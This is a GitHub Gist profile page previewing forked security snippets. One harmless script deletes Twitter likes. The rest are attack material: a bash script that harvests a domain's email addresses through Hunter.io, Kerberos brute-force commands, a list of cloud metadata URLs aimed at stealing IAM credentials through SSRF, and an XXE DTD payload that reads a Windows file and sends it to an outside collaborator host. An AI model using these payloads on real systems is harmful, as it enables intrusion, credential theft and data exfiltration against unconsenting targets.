Skip to content

Instantly share code, notes, and snippets.

View faisalrathore's full-sized avatar
💭
Find Bugs!!

Faisal Rathore faisalrathore

💭
Find Bugs!!
1 follower · 5 following
View GitHub Profile
@faisalrathore
faisalrathore / delete-likes-from-twitter.md
Created September 27, 2021 09:22 — forked from aymericbeaumet/delete-likes-from-twitter.md
[Recipe] Delete all your likes/favorites from Twitter

Ever wanted to delete all your likes/favorites from Twitter but only found broken/expensive tools? You are in the right place.

  1. Go to: https://twitter.com/{username}/likes
  2. Open the console and run the following JavaScript code:
setInterval(() => {
  for (const d of document.querySelectorAll('div[data-testid="unlike"]')) {
    d.click()
 }
@faisalrathore
faisalrathore / hunterio.sh
Created August 21, 2020 06:33 — forked from streaak/hunterio.sh
Script to gather emails from Hunter.io API
#!/bin/bash
total=$(curl -s "https://api.hunter.io/v2/email-count?domain=$1" | jq -r '.data.total')
echo "Total is $total"
if [ "$total" != "0" ]; then
for (( i=0; i<=$total; i+=100 ))
do
echo "offset $i"
curl -s "https://api.hunter.io/v2/domain-search?domain=$1&api_key=KEYHERE&limit=100&offset=$i" | jq -r '.data.emails[].value' >> hunter_emails.txt
@faisalrathore
faisalrathore / kerberos_attacks_cheatsheet.md
Created July 19, 2020 13:50 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@faisalrathore
faisalrathore / cloud_metadata.txt
Created February 8, 2020 10:20 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@faisalrathore
faisalrathore / unviewable.dtd
Last active August 24, 2020 15:50
<!ENTITY % file SYSTEM “file:///c:/windows/win.ini”>
<!ENTITY % p2 “<!ENTITY e1 SYSTEM ‘http://aguy7bo9ph3ftj5ta9kglhmqkhqaez.burpcollaborator.net/content?%file;’>”>
%p2;